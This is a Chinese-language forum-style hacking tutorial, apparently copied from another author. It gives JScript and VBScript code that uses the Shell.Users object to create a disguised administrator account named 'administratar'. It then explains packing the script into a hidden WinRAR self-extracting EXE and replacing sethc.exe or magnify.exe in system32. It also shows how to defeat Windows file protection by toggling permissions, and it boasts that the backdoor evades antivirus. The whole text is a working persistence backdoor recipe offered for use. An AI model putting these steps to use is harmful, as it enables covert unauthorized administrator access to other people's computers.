借用别人写的不用CMD加用户的脚本
js:
var o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
z.changePassword("123456","")
z.setting("AccountType")=3;
vbs:
Set   o=CreateObject( "Shell.Users" )
Set z=o.create("test")
z.changePassword "123456",""
z.setting("AccountType")=3

选任意一个脚本，这里我用VBS脚本，把帐号密码设复杂一点，这样在有显示密码复杂度的服务器也能用了。

比如：

Set   o=CreateObject( "Shell.Users" )
Set z=o.create("administratar")
z.changePassword "fuck12.",""
z.setting("AccountType")=3

保存为user.vbs

运行后会添加一个名为：administratar 密码为：fuck12.   的超级管理员

重点来了。   大家都会用WINRAR制作EXE自解压文件吧

把user.vbs添加为user.exe自解压文件 ——高级——在当前目录中创建——解压后运行 user.vbs ——标签设置成全部隐藏——覆盖所有

————完成


这样一个可以添加用户的EXE文件就OK了

然后把这文件改成 sethc.exe 或magnify.exe   放进system32目录下覆盖即可

但是覆盖后WINDOW会自动恢复怎么办呢

我用了一个最笨的方法 复盖进去后，直接把权限全部拒绝。

等待几秒后   不自动修复了   再把权限打开   这样一个 后门就做成了


而且{yj}免杀~！